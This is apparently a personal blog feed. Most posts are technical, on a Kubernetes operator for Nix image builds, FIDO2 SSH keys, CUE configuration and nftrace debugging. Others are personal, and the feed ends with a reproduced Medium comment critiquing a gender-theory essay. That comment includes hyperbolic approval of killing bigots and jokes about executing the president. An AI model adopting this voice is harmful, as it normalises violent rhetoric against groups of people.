Update on enbi (source) — it now monitors Pods with annotations describing which flake to build and what tag that build should produce. When it notices one failing to start due to a missing image matching the annotations, it creates a NixBuild matching the requirements, which in turn runs the build and loads it into the cluster! Successful builds clean up after themselves, though I’m leaving around the NixBuild objects themselves for now. Failing builds leave the Job/Pod in place for troubleshooting.

Updating the version of one of my apps which use my standard pattern for building Docker images with Nix is now just a matter of changing the tag in one place (e.g.); the cluster figures out building it and moving to the new release without downtime.

This has been a fun one week sojourn into writing Kubernetes operators :) The API is pretty neat, controller-runtime feels clean, and it was enjoyable discovering how many assumptions I had to unlearn while negotiating where the controller was running, where its jobs were to be scheduled, how to move data around, and the like.

"contempt culture" applies even when you, personally, do not like the thing in question

2025-08-29T02:12:12Z

I’ve seen doineedkubernetes.com dropped a few times in the last week, sometimes by the same kind of person who would in the next thread about something else link Aurynn Shaw’s Contempt Culture. Here’s looking at you!

(i just typed isjavascriptgoodyet.com into my browser — given the focus it receives in the aforementioned essay — not knowing if such a domain existed, and what do you know! Consider who your neighbours are.)

To give some more context, I basically didn’t give a damn about k8s, and then one day I read Dear friend, you have built a Kubernetes and it stuck in my mind. It stuck there right up until I was in a work situation where I realised that this was essentially exactly what had happened, and furthermore that the accumulating shell scripts I had been surrounded by for years had cost us so much, and were doing their job so increasingly poorly, that they badly needed to be replaced by something actually purpose-built, and that that something was in fact Kubernetes.

And so I decided to learn it thoroughly, to perhaps apply it in this work situation, but in the end the “engineering dysfunction mirrors organisational dysfunction” property indeed goes two ways and it was going to be more of an uphill battle than I could take on at this point in my life. But now I know Kubernetes, and I am thankful for that. I bounced off Nix the first time I tried it in earnest (2020), too.

nix build → nb → enbi

2025-08-26T12:35:55Z

Still pre-alpha, but tonight I got the first complete run of a little Kubernetes controller I’ve been wanting!

Wahoo yipee etc.! Right now we have a CRD which triggers a Nix build of a given flake URL, expected to produce a Docker or OCI image — it chooses a node which can build for the target system, spawns a Job which builds the target, and then imports it into the node’s container registry. We assume that something like Spegel is running and so any node that needs the image will pick it up.

The “hard” part (other than writing directly against the k8s API for the first time) was getting the Nix stuff to work well vis-à-vis building in a container while caching everything nicely — the flakes themselves, as well as whatever ends up in the store, as much of it will be reused between versions. Thankfully all the tooling is Cool As Fuck and it was actually really easy. We create a locally-provisioned PersistentVolume per node and stuff $HOME/.cache/nix and the Nix store in there. For now we use a chroot store, but I’d like to try an overlay store in future to avoid potentially duplicating whatever comes along in the nixos/nix image. Importing into the node’s container store is as simple as mounting the host /run and locating containerd’s socket — it differs depending on your k8s distro, and I’m developing on kind while deploying to k3s.

I still have to clean it up in this state, and have plans after this to remove the CustomResourceDefinition and trigger builds automatically when needed, getting the source details from annotations on the Deployment, but I’m happy. I don’t particularly like manually executing builds, nor do I want to stand up a registry and pre-build everything. My cluster runs on two architectures, but whether any given revision of an application will actually ever run on either, both, or any(!) of those is a matter of the particular scheduling constraints for the application and the state of the cluster at any given moment. Rather than waste energy pre-building and storing, let’s build on-demand instead! 💛🤍💜🖤

todo lo viejo es nuevo otra vez

2025-08-25T03:53:28Z

Was looking through old emails for some receipts (the literal kind, not the Twitter kind), and stumbled upon this beauty of an opener:

Date: 2016-12-19.

conclusion: patch OpenSSH!

2025-08-24T02:47:06Z

John Goerzen’s Easily Using SSH with FIDO2/U2F Hardware Security Keys came up yesterday, and I thought it was a good time to fix my mess of private keys. I already own a YubiKey 5C Nano, which sits in my laptop at all times, as well as a 5C NFC, which I figured I could use hopefully with both my phone (NFC) and tablet (USB-C) for SSH when needed.

The ideal was to drop all non-SK keys, and use move to using agent forwarding exclusively when authenticating between hosts — rarely needed, but nice for some remote-to-remote scps or git+ssh pushes. (Agent forwarding is traditionally frowned upon, since someone who has or gains access to your VPS can use your socket to get your agent to auth things, but that issue is greatly reduced when user presence is verified on each use, viz. requiring you to touch your key.)

Turns out all was pretty much that easy! Just two minor hiccups:

Terminus on iOS supports FIDO2 keys, no payment required (despite what some search results say; looks like it was maybe a paid-only feature during beta but since not). Non-resident Ed25519 keys work very well over NFC on iPhone, but not over USB-C on iPad. The only reference I can find is this from their “ideas” page:

Unfortunately, iPads and iPhones with USB-C cannot be compatible with OpenSSH-generate FIDO2-based keys. Please generate new FIDO2-based keys in the Termius app. These keys are supported in OpenSSH and all Termius apps.

Upon testing, Terminus generates a non-resident ECDSA, and that works just great. So, in the end, I have three private keys: an Ed25519 for the 5C Nano, and an Ed25519 and ECDSA for the 5C NFC for use with NFC and USB-C respectively.
The OpenSSH bundled in macOS (at time of writing, OpenSSH_9.9p2, LibreSSL 3.3.6) doesn’t support the use of these keys. I haven’t checked whether it’s non-resident SKs specifically or what, or whether it’s the version or just a matter of what support is compiled in.

NixOS/nix-darwin 25.05 carries an OpenSSH_10.0p2, OpenSSL 3.4.1 11 Feb 2025, and it does!

Using agent forwarding without losing what’s left of one’s humanity implies getting your ssh-agent setup working nicely. How?

I looked into a few different ways, but opted for the simplest: patching OpenSSH (!?). The thought process is as follows:

/System/Library/LaunchAgents/com.openssh.ssh-agent.plist will put an SSH_AUTH_SOCKET in your environment, which launches the system-provided ssh-agent when first addressed.
This is a nice, macOS-y way to do things, but we don’t want to go down any rabbit hole that involves disabling SIP, so we can’t just swap the binary path (or binary itself) out.
- Even if we could, we still need to add launchd support to the ssh-agent in Nix. Thankfully, the needed changes are small, and easy to find; just look for __APPLE_LAUNCHD__ in ssh-agent.c.
In my experience, disabling the system-provided launch agent doesn’t work reliably.

We apply two patches:

Finally, we install our own launchd user agent (modelled upon the system one, but with our binary), which puts the socket in the VYX_SSH_AUTH_SOCK env var instead. This means we don’t need to worry about the system launch agent; it’ll only get triggered/used when something calls the system ssh binary.

Head teed!

jackalgirls & CUE

2025-08-23T03:19:46Z

Today it was finally time to write a policy file for one of my Anubis instances. I use Timoni as a fairly thin wrapper over CUE to write templates for my own k8s deployments, and I found it really shone in this particular instance. I’ll just tl;dr and show the code; here’s an excerpt from my blog engine’s bundle.cue, which is the “entrypoint” for compiling its manifests:

anubis: {
  secretName: "anubis-20250816-071240"
  policy: permitPaths: [{
    name:       "permit-atom-xml"
    path_regex: "^/atom\\.xml$"
  }, {
    name:       "permit-feed-xml"
    path_regex: "^/feed\\.xml$"
  }]
}

I’m aiming to expose just a minimum of configurability first. Here’s how the schema side of that is defined in config.cue:

anubis?: {
  // Needs to already exist in the target namespace. Should have key
  // "ED25519_PRIVATE_KEY_HEX".
  secretName: string

  policy?: {
    permitPaths: *[] | [... close({
      name:       string
      path_regex: string
    })]
  }
}

I grabbed the default root bot policy file from https://github.com/TecharoHQ/anubis/blob/main/data/botPolicies.yaml, and converted it to CUE with cue import botPolicies.yaml. Then we put it in the templates package, add a way to inject our config, and use the config to expand upon the defaults:

package templates

#AnubisBotPolicies: {
  #config: #Config

  //# Anubis has the ability to let you import snippets of configuration into the main
  //# configuration file. This allows you to break up your config into smaller parts
  //# that get logically assembled into one big file.

// ...

  }, if #config.kv.anubis.policy.permitPaths != _|_ for setting in #config.kv.anubis.policy.permitPaths {
    name:       setting.name
    path_regex: setting.path_regex
    action:     "ALLOW"
  }, {

// ...

Finally, the bit I really like: creating the ConfigMap (which gets mounted as a volume) with the policy YAML:

#AnubisConfigMap: timoniv1.#ImmutableConfig & {
	Config=#config: #Config
	#Kind:          timoniv1.#ConfigMapKind
	#Meta:          #config.metadata
	#Suffix:        "-anubis-env"

	#Data: {
		"policy.yml": yaml.Marshal(#AnubisBotPolicies & {#config: Config})
	}
}

Note the careful lack of hand-written YAML at any stage! 💛🤍💜🖤

lock tf in!!

2025-08-22T03:45:24Z

By the wonderful Kinu; base from DeviantArt.

just keep looking deeper! the answer is in there!

2025-08-21T03:29:12Z

La herramienta del día es nftrace. I couldn’t work out why some pods weren’t able to communicate with each other across the Tailscale mesh. Suspected ACLs, suspected routes weren’t getting installed correctly (p.s. ip route show table 52 (!?)), suspected local firewalls, suspected so much. tcpdump only gets you so far.

Finally, on the target node:

$ doas -s
# nix shell nixpkgs#nftrace nixpkgs#nftables
# nftrace add ip daddr 10.59.1.213
# nftrace monitor

Try the request that isn’t making it through a bunch of times until you can isolate the exact sequence. ^C, nftrace remove, and read carefully:

trace id daac839a inet nftrace-table nftrace-chain packet: iif "tailscale0" ip saddr
    100.67.157.26 ip daddr 10.59.1.213 ip dscp cs0 ip ecn not-ect ip ttl 64 ip id 32261
    ip protocol tcp ip length 60 tcp sport 33233 tcp dport 9090 tcp flags == syn tcp
    window 64480
trace id daac839a inet nftrace-table nftrace-chain rule ip daddr 10.59.1.213 meta nftrace
    set 1 (verdict continue)
trace id daac839a inet nftrace-table nftrace-chain policy accept
trace id daac839a ip filter FORWARD packet: iif "tailscale0" oif "cni0" ip saddr 100.67.157.26
    ip daddr 10.59.1.213 ip dscp cs0 ip ecn not-ect ip ttl 63 ip id 32261 ip length 60 tcp
    sport 33233 tcp dport 9090 tcp flags == syn tcp window 64480
trace id daac839a ip filter FORWARD rule  counter packets 44827 bytes 28768164 jump
    KUBE-ROUTER-FORWARD (verdict jump KUBE-ROUTER-FORWARD)
trace id daac839a ip filter KUBE-ROUTER-FORWARD rule ip daddr 10.59.1.213  counter packets
    5001 bytes 6279235 jump KUBE-POD-FW-FIAOHC4WHRKERAQ6 (verdict jump
    KUBE-POD-FW-FIAOHC4WHRKERAQ6)
trace id daac839a ip filter KUBE-POD-FW-FIAOHC4WHRKERAQ6 rule  counter packets 5 bytes 300
    jump KUBE-NWPLCY-ZYSQVVSY5LQY7Q46 (verdict jump KUBE-NWPLCY-ZYSQVVSY5LQY7Q46)
trace id daac839a ip filter KUBE-NWPLCY-ZYSQVVSY5LQY7Q46 rule  limit rate 10/minute burst 10
    packets meta mark & 0x00010000 != 0x00010000 counter packets 5 bytes 300 log prefix
    "DROP by policy monitoring/prometheus-k8s" group 100 (verdict continue)
trace id daac839a ip filter KUBE-POD-FW-FIAOHC4WHRKERAQ6 rule  meta mark & 0x00010000 !=
    0x00010000 limit rate 10/minute burst 10 packets counter packets 5 bytes 300 log group
    100 (verdict continue)
trace id daac839a ip filter KUBE-POD-FW-FIAOHC4WHRKERAQ6 rule  meta mark & 0x00010000 !=
    0x00010000 counter packets 5 bytes 300 reject (verdict drop)

What’s that? log prefix "DROP by policy monitoring/prometheus-k8s"?? Guuaaaaauuuuu.

devops? devops! (part 1)

2025-08-18T05:11:08Z

This is part 1 of x in a series.

I have spent most of my life avoiding DevOps-y type things. At GitHub I got familiar enough with kubectl to help debug the applications I had deployed on it, but that was almost a decade ago and I don’t remember a single bit of it.

Most of the things I run I deploy with a really simple systemd unit definition in the Nix module. Here’s an excerpt from the one for the Elixir app this blog ran on:

{
  systemd.services.kv = {
    description = "kv";
    enableStrictShellChecks = true;
    wantedBy = [ "multi-user.target" ];
    after = [ "kv-migrations.service" ];
    requires = [
      "postgresql.service"
      "kv-migrations.service"
    ];
  
    script = ''
      export KV_STORAGE_ROOT="$STATE_DIRECTORY"
      ${envVarScript}
      ${cfg.package}/bin/kv-server
    '';
  
    serviceConfig = {
      User = cfg.user;
      ProtectSystem = "strict";
      PrivateTmp = true;
      UMask = "0007";
      Restart = "on-failure";
      RestartSec = "10s";
      StateDirectory = "kv";
      StateDirectoryMode = "0750";
    };
  
    inherit environment;
  };
}

It’s very basic, and it worked beautifully! I love that, with NixOS, you can package a reproducible build (with all its dependencies), deployment strategy, and configuration schema all in one place. It’s so damn clean, and it works wonderfully for homelab- or personal services-scale systems. (For more, try Xe’s All Systems Go! talk, Writing your own NixOS modules for fun and (hopefully) profit.)

The downside is that this is not exactly a high-availability setup. When any of the dependencies of a service like this change — such as a new cfg.package, or change in environment — the result is that the existing service is stopped, the service is swapped out, and then the new one is started.

There can often be 10–30 seconds between the stop and start, depending on how much else the nixos-rebuild has to do. And while a failing build won’t leave you with a stopped service — you won’t even get that far — if the build succeeds, but the new service fails to come up for some reason, then you’ll be scrambling fast.

This being NixOS, getting your service back up is as easy as switching to the previous generation, and can be done very fast, but still, it’s not great. Realising this, and still very much wanting to use Nix as a build orchestrator in places where this isn’t an acceptable trade-off, it was time to learn a devops.

Structurally, Kubernetes seems relatively sound, giving us language for defining the shape of a deployed system upon many different axes. It is very YAML and it is very containers, neither of which I am the hugest fan of, but I felt pretty sure there would be tools to help with the former, and Nix my beloved has beautiful solutions for the latter.

If, like me before the start of this exercise, you don’t really know about the model Kubernetes gives you to work with, you might find useful David Ventura’s blog post, A skeptic’s first contact with Kubernetes. If I had found it before and not immediately after coming this far it would’ve been super helpful -_-

One thing worth mentioning is that, as a Very Nix Person (and Very Dissociated Person), I really need my infrastructure to be described in a version-controlled way. Ideally, I would be able to tie all of my infra back into the same place (which is vyx, a Nix flake).

So I decide to start up a cluster and begin experimenting. I hate Docker, Inc. with a passion — I will never forgive them for getting rid of Docker for Mac’s cute whale — plus I want to learn somewhere where I can actually deploy things, so I decide to start with k3s on my VPS. How I chose k3s to begin with, I’m not so sure — maybe because it has relatively few options exposed in its Nix module. Lightweight sounds good, and it’s a “certified Kubernetes distribution”. Whatever that means, it must be good!

NixOS has the option services.k3s.manifests, which is described as “auto-deploying manifests”. Perhaps this is the magic sauce I need to get my infrastructure as code!?

(The answer is, no, it isn’t — the entire cluster is restarted when you change its values, because NixOS. Teehee.)

Nonetheless, I struggled through writing some early manifests this way. Writing YAML in Nix is way better than writing YAML, and very easy to parameterise, extract functions, and so on. I had seen mention of Helm charts here and there, and while I felt like one day I would need to come to terms with them, I preferred to leave that until as late an opportunity as possible. As a bonus, using k3s auto-deploying manifests in this way meant I could write a NixOS module to deploy an application in Kubernetes, without a single line of raw YAML.

So, terrible in many respects — now bringing down an entire cluster on each change instead of just the relevant services (!!!) — but an introduction nonetheless. We are now at the point of siguiente:

Decided to turn that homelab server into a gaming PC instead, haha psyche! Instead decided to learn better how to cross-build things and operate k3s without trying to shove everything through a NixOS module.

Part 2 will cover building our own software ready for orchestration (using Nix — we won’t write a single Dockerfile, promise, and as a little bit of a spoiler, we won’t write a single Go template either), and the unique fun presented by developing on aarch64-darwin while largely deploying to x86_64-linux. :)

external-dns-bunny-webhook

2025-08-18T05:03:29Z

Just a quick field report. I wanted to try ExternalDNS; I use bunny.net (obviously), and found external-dns-bunny-webhook! Perfect!

Only, it crash looped on startup. After asking myself whether I was really bothered enough to try getting a development environment setup for this (and then asking Annie, who helped resolve it to a yes), I rewrote the build process and development environment in Nix and got a fork with a fix going.

Given the sorry state of GitHub, I figured it was time to start opening “pull requests” there in the form of issues that contain instructions for fetching from off-site. Included here for posterity.

I really wanted to get this working for me, so I ended up forking the project with my fix and build environment. The webhook currently doesn’t handle root records being handed to it by ExternalDNS correctly, and will panic if that happens.

You can find the source here: https://nossa.ee/~talya/external-dns-bunny-webhook.

If you’d like to pull the relevant commit, this should do the trick:
$ git fetch https://nossa.ee/~talya/external-dns-bunny-webhook acb21849b8292222d7e0c85ac8d3dea913147bad
$ git cherry-pick FETCH_HEAD
The patch is inline here if you’d rather apply it directly with git am:

(elided)

blogging, ADHD, and You

2025-08-16T08:54:26Z

This probably doesn’t apply to nearly everyone in the target demographic, but the connection to me seems pretty clear.

I like computers. Static site generators are neat; conceptually they are clean, they ask for almost no infrastructure for your deployed site, are performant as heck, all of that.

I also have ADHD. One extra step can be the difference between a task ever getting done or not.

I also enjoy writing, and would like to do it as often as inspiration strikes.

If I look at my posting history, there are some clear periods where I happily post a lot, and then there are the other times.

The former are periods where I am using something where I can write and publish a piece of work entirely from my phone, or a browser tab lazily opened and then closed.
The latter are those periods where I am relying solely on an SSG, where publishing usually minimally involves creating a file, writing in it, running a server process to preview the result as I write, calling it done at some point, then running some kind of generate and upload process, as well as committing to version control.

I’ll note too that “well you can always write a draft in a note and then do the publishing work later” doesn’t help, at all — it hasn’t made anything simpler, that’s actually adding a step.

We want to reduce the cycle time as much as possible. Giving yourself aliases and shortcuts to make the necessary steps involved in publishing with SSGs closer to hand is great, but for me at least, the results speak for themselves :)

where is your rss! please!!

2025-08-16T08:37:46Z

This keeps happening:

I read a blog post I really like; maybe I found it on Lobsters, maybe it was a link via another blog, who knows. I liked the post.
I read other posts on their blog. I read the about page, or look at some projects! This is a cool person!
I decide I’d love to keep reading their blog. I look for an RSS/Atom feed, so I can know the next time they post, and the next, and the next!
There is no RSS or Atom feed. There is no way to find out the next time they post, short of manually checking every so often, and that is not practicable.
Sad.

This happens surprisingly often — “surprisingly” because, if you don’t give your readers some way to actually be “your readers”, you kind of guarantee you will not have any readers! In which case, I mean, it’s cool that you write and all, but see point number 5 above: sad!! I want to read your posts! Please let me!

(I am writing this post partly so that I can include it in the emails I send to folks when I find out they don’t have a feed I can find. If I have sent this to you, I mean no offence, nor do I wish to put work onto you! I’d just like to share that I think your blog is neat, enough so that I felt moved to reach out to you.)

welp ¯\_(ツ)_/¯

2025-08-16T06:45:54Z

Have been nursing some chest heaviness, palpitations and shooting pains for 10 days now. These symptoms on their own aren’t particularly uncommon, but a week ago some incredible neck and shoulder pain started to flare up on top of it — and get worse, and worse, and worse; like, all day soreness, pretty much trying to knead my left shoulder (in particular) into not-wanting-to-have-it-surgically-removed.

I have been to the ER for a self-suspected blood clot/heart attack/whatever before, and didn’t particularly want to repeat the exercise. Maybe it was just a chest infection with extra steps? After umming and ahhhing about it for a couple days, worsening, I finally book a GP respiratory appointment. Yesterday afternoon the appointment time arrives.

I have to “I know what it sounds like” to the GP a few times, explain my elevated heart-rate on arrival is probably just POTS (since I was sitting in the car waiting for the all clear to come in, not in the waiting room), explain the pain in my legs is probably just the chronic pain I always have in my legs, and after listening to my lungs (all clear) he directs me straight to the ER. I am thankful to my and Annie’s MSA 900s, and it who told me about them.

Chest XR, RAT, ECG, bloods to check for clot or heart damage — nothing. Everything looks fantastic. Maybe it’s pleurisy. Go home, rest, eat lots of vegetables.

So this is where we’re at!

on llms (Ⅱ)

2025-08-15T12:25:07Z

It is phenomenal that, for all the hand-wringing about the wastefulness of Electron apps and bloat of modernity, the industry managed to find a way to take that to the n’th degree, and somehow have ~everyone buy into it, even as the results range consistently from mediocre to outright deleterious, not to mention the frankly insane externalities. May deep shame find its way under the skin of those peddling and enabling this multidimensional clusterfuck of an insult to what is good.

girls kissing, in your area

2025-08-09T06:38:51Z

“It could never work. She doesn’t like Nix flakes.”

“a gender terrorism, if you will.”

2025-08-05T05:44:37Z

I’ve just had the pleasure of reading three interesting pieces of discourse.

First up, Alyson Escalante’s 2016 piece “Gender Nihilism: An Anti-Manifesto”. There is very little about this I have to disagree with.

Then, her own 2018 response to that work, “Beyond Negativity: What Comes After Gender Nihilism?”. On the one hand, pushing for a more material analysis is excellent, though I feel like all the work is actually done here by Wittig and this merely restates it

On the other hand, what on earth is this ending? It reads just like any other wishy-washy proclamation, missing only a communism,-now!.88x31.gif to slap on your homepage in solidarity. This anti-anti-manifesto is decidedly a manifesto.

The comments, however, conceal a banger which I nearly missed. “blister” (@destroysound) starts, and then wow, they continue. I don’t trust Medium to continue existing for that much longer — or even the Wayback machine (which Medium very carefully tries to break :) love it) — so I’m reproducing it here in its entirety.

There is very little about this I have to disagree with.

blister (Jul 9, 2018 (edited))

nihilism is infinitely preferable to simplistic, contrived explanations and lack of intellectual rigor. nihilism is eminitely useful and practical for critique, for attack, for demonstrating what cannot be known or said. let me preface by saying this — i don’t disagree with your thesis, but your conclusion. the struggle for gender abolition may well be linked to the struggle for communism, in fact, i think that this is extremely likely to be true. it is altogether probable that establishing communism will improve material conditions for everyone (except the bourgeoisie), especially marginalized people such as those who are gender variant. but you haven’t done any of the due diligence to show that that establishing communism and gender abolition are equivalent (other than to quote someone who simply tells us they are and provides no evidence to back up this claim).

to begin with, you claim that butler’s construction of gender is not comprehensive. but your new conception is exponentially less so — it relies on a naive sex binary and assumes that there are no more complicated forces at play than a simple narrative of class struggle. you’re replacing a complex, subtle, well thought out, researched conception of gender with many points of actuation with, literally, “girls are oppressed and boys are oppressors”. you apparently expect nobody to notice the shell game you are playing here. your new conception of gender would be considered incomplete and dishonest by anyone who had taken a single undergraduate womens studies class, as they would all recognize that patriarchy harms men as well, for example, by strictly limiting their societally acceptable roles and behavior. not to mention there is no conception here of intersex conditions, trans individuals, nonbinary individuals, third/fourth genders. all of which are conditions for which we have historical evidence of dating back to paleolithic times in some cases, all of which we have observed in native societies, all of which appear to be normal, naturally occurring phenomena, with much evidence pointing at a neurological source for some of these conditions. surely you don’t expect us to believe that the construction of third or fourth genders in many native societies the world over was shaped by class struggle. if that really is your thesis, you should be able to find evidence of such in those societies — for example, what kind of economic and political forces cause a society to develop 3 genders instead of 2? is there any pattern to the nature of societies that express 3 genders? for example, if third genders are all systematically oppressed, why? if not, what causes their formation, since your position is that it is the oppression that precedes the identity? this is all being very lenient with your theory of gender as it doesn’t even conceptualize any of this at all.

and of course, you haven’t done any of this ground work that i just described. we are expected to just accept this stale, offensive binarist narrative that makes oppression the very core of the female identity, indeed, we are meant to believe that there is no female identity other than being the oppressed. if that is true, why would any trans woman who understands this choose to transition? are trans feminine people simply absurd masochists who choose or are compulsed to put themselves into a role which is defined by being oppressed? are we just (slightly) more socially acceptable rachel dolezal clones once more? or is it a simple (and self-destructive) aesthetic fetish — an invocation to buffalo bill, perhaps? if gender is only a material relationship, and nothing else, then trans feminine people seem to be headed suspiciously in the direction of our old friend, the ‘mentally ill’ evaluation again, or at least, to be looked at with a nervous eye, like someone who enjoys flinging themselves down stairwells for fun. hi, i’m blister, welcome to jackass.

you remark that gender nihilism, “due to its grounding in a faulty and misapplied foucauldian notion of displaced and dispersed power, never asks whose power is being enacted and whose interest this all serves” as if this is not a question which could be cleanly answered by a post-structualist analysis and which might, there as well, lead into a discussion of market and political forces as well as many other forces which are exerted on particular gendered identities. so, if the original argument never asked the question, then maybe the logical start might be asking the question, instead of re-contextualizing the entire argument? since you chose to throw out the whole argument instead, this was obviously pretense. you might as well have just written “i’m a marxist-leninist now, so i have to recant all of this horrible postmodern stuff” and had done with this article.

you unfairly equate nihilism with bleakness — despair and lack of hope, and then ironically place all of your precious newborn hope in a project that is essentially just a contrived vessel for these hopes, with no clear plan on how we will actually get there or what will happen to gender when we do. will gender disappear? why does gender demonstrably exist in the historical record and in native societies and before the formation of capitalism then? as a matter of fact, what happened to gender in various implementation of communism? any historical basis for your argument.. at all? you summarily list “patriarchy”, “white supremacy”, “colonialism”, “the nuclear family” and “capitalism” as the factors that lead to the construction of gender and very neatly, they are exactly what your panacea aims to address. you haven’t provided even a tiny sliver of insight into how building communism will naturally lead to gender abolition — only shown that it will lead to better material conditions for women and queer folks, which should have been obvious to any lukewarm brain in the first place. how does this naturally lead to gender abolition?

do you surmise that the gay identity will also vanish under communism? there seems to be no historical basis for that sort of claim in actual communism in the wild, and quite a bit of evidence that actually, homophobia doesn’t just go away under communism either, so it seems unlikely that this was intended. is the gay identity somehow fundamentally different than the trans identity? than other gender identities? how could there even be a gay identity without gender, anyway? what about other identity politics? what force or program will cause this? how will it operate? can this trick be shown to have been performed successfully historically? is this also a kind of alchemy of hope? will gender disappear if you stop believing in fairies?

what happens to non-binary gender identities in any interim period? are they still afforded special rights until their identity somehow vanishes? or are they ignored and become victims of inevitable hate crimes due to their visibility? do we make temporary hate crime laws? that measure seems like it contradicts your thesis quite a bit. does the revolution suddenly make people who hate gender nonconforming folks stop? or do we just kill every last one of them? (i’m on board with that last suggestion) do we create a concept of thoughtcrime? is tom cruise involved? do we just ask gender nonconforming people nicely to stop making and using identities, there’s too many of them, thank you, as soon as we get done storming the white house and executing the POTUS? how will building communism stop the proliferation of gender identities? what will stop LGBT people from continuing to desire to map out our differences using identity? will people have sexual preferences for other people who have particular types of genitals under communism? will people have sexual preferences for particular types of bodies? will hormonal differences be dealt with via medical intervention as a child in order to eliminate visibly transgender people? will visibly trans people be considered ‘third gender’ during any interim period, or at any time at all? what’s to stop this? and again — what is the class character of a third gender anyway? will people be able to get sex reassignment surgery? how will those people identify themselves? will transgender people be required to identify themselves to lovers under law? what if doing so would make them unsafe or subject to misapplied homophobia? and if trans people can be subject to homophobia, then how can material conditions be the only component to a conception of gender at all? should a man be legally allowed to shoot a transgender woman if he takes her home and then realizes she has a dick? in general, will homophobia ever be used to justify violence against people whose genitals are atypical for their gender presentation (trans panic)? how do we stop this during any transitional period? how do we stop homophobia in general? just be communists for a while? how long until bigots stop passing bigotry on to others? 100 years? 200? how many trans people are gonna get killed during that time while we figure out how to create this cold fusion generator? how will the system prevent prejudices like homophobia from re-establishing a conception of gender identity through common fear (see also — bathroom panic, trans panic). how will people designate their sexual preferences to others? will this reference gender identity? gender presentation? sex? something else? could any of these things reify gender identity once it has been abolished?

what mechanisms will stop the ‘outsider effect’ towards those who have an atypical gender presentation? in case you are unaware, the outsider effect is a proven and testable bias against people who are not recognized as having a shared identity with the subject (this effect can occur even when the ingroups and outgroups are determined randomly: https://www.theatlantic.com/politics/archive/2014/09/how-politics-breaks-our-brains-and-how-we-can-put-them-back-together/453315/). perhaps this, too, is a symptom of the us-vs-them narrative of capitalism — but it seems too pervasive to be likely. if it is, what could be the cause? if this is, instead, an evolutionary feature, what steps will society take to negate it? will you institute programs to build a common sense of identity with people of various gender presentation? will we generate propaganda informing people of the existence of others whose bodies are not like their own, but assurethem they are nevertheless our comrades, we promise. how is this any different than what we do right now? will the housing project expose everyone to a rare phenotype of somehow still undifferentiated, identity-less human so that people become more tolerant to differences? what if people with that gender presentation or sexual characteristics are VERY rare, say, 1/1000 or less (ie: persons with an intersex condition, for example, 5α-reductase deficiency)? maybe there can be meet and greet sessions, or mandatory viewing of educational renditions of ru-paul’s “female or sh*m*le” segment. again — how would any of these techniques, loosely categorized as ‘visible gender diversity’, be different than how we already raise awareness for such concerns right this moment under capitalism?

in general: what’s to keep old concepts of identity from seeping back in to your pristine, identity-less biosphere? how will we shed them in the first place? will ex-men voluntarily give up their male identity? will ex-women consciously stop referring to themselves as women? will we stop gendering others? why would we make the effort to do this? will there be penalties if we do not? will everyone at once choose to forget all of the gender-based signifiers that we learn throughout our lives — pink and blue, dresses and slacks, barbie and gi-joe, jack and jill, link and zelda (these two can even switch gender), football and ballet… will we just all at once forget that this entire language of gender signifiers ever existed and immediately stop judging others based on gender? if not, what process will cause this? how can we be sure that all of our old prejudices are gone? will anyone assume that women are more emotional than men during any transitional period? will anyone look down on a man if he cries during this period? how do we stop these stereotypes from propagating? how are they directly linked to material conditions anyway? aren’t the reasons for these false judgements actually usually attributed to ‘hormones’, something that butler mentions in her definition of gender? is there any basis to that? are there any other reasons? are they really due to market and political forces? if so, how? will the result of this whole process look like a completely uniform set of humans that display no sex characteristics or gender signifiers whatsoever? how would we even get there? and how could such a thing be maintained? what would be the consequences?

you rightly show via sources that establishing communism and relocating queer children to loving homes would increase their quality of life (although, of course, this alone cannot be shown to end homophobia, which seems to be demonstrably present in existent communist societies as mentioned above). but what reason do you have to think that building communism will lead to the complete elimination of the nuclear family when that paradigm has been dominant in europe since the 13th century — during which time not even agrarian capitalism had been developed! will parents be separated from their children at birth? will you maintain diversity quotas in each communal housing block? one trans person, 4 gays, and 3 bis per city block, please. will all children be randomly rotated between private homes to avoid normalization of a particular style of relationship? what will the results of this unprecedented intentional rearrangement of the family unit be? how could we possibly even know? how will this new arrangement avoid replicating the exact structure of the nuclear family without a particular necessity for blood relations via spontaneous formation (exactly what happens right now)? or shall wesimply elect to grow individuals in vats, a truly brave new world. that might be the best option, since via technological handwaving you can be sure that everyone born has the same sex, gender, and sexuality. this would actually be less handwaving than any other method i’ve mentioned because now you just have to figure out a straightforward technical solution rather than an np-impossible lovecraftian social bullet hell with more unsolved question marks than the riddler’s walk-in closet. but again, there are, of course, no details about how this project will be accomplished, or what parts of the nuclear family are of most concern, only that it will be accomplished somehow by a program involving communal housing and rehoming lgbt kids, and that the stated goal is to destroy the nuclear family. as a matter of fact, this is a goal that we both share, but fortunately enough, it seems to me that this odious beast is nearly on its death bed already, and i plan on stabbing it a few times more and desecrating its corpse on my way out, so you might not even bother.

you invite us to perform “daring imaginations of new futures” and develop “a clear set of materialist theoretical principles and praxis to unite around” but you don’t do any of the ground work on any of this yourself or give us any examples or speculation to convince us that this new waypoint that you’ve set on the way to abolishing gender is going to take care of resolving even a significant portion of the goal. i’ve done more honest imagination here of what such a future or program might look like than you did in your article, and i can’t really see it being an instant win in any way. you can’t just tell people to “build communism” and “imagine the results” to avoid having the impetus of doing the hard work of showing how it would actually operate. your proposal is more of a directive and a hope — it’s not that it asks more questions than it answers, it asks ALL of the questions and answers none. and then, to wrap it up, you instruct us to go forth, have hope (which is really the only praxis you are advocating here), and nihil no more. cheer up emo kid, the vanguard of the revolution will be by shortly. if i can speak frankly, i can assure you that this article did not give me hope. my experience of gender is atypical and i often bump up against the absurdity of it in my daily life. the inability of identity to encapsulate my experience is something which troubles me regularly. ironically, the simple acceptance of the unintelligiblity and incoherence of gender identity makes me feel more relieved than the proposition that i am going to need to wait and work for a revolutionary moment and the implementation of communism, as well as coherent, actionable, scientific solutions to many of the questions above (many of which seem very difficult), before i see even a potential improvement to the random and incoherent whims of gender identity. there are trans people out here dying and we need a solution today.

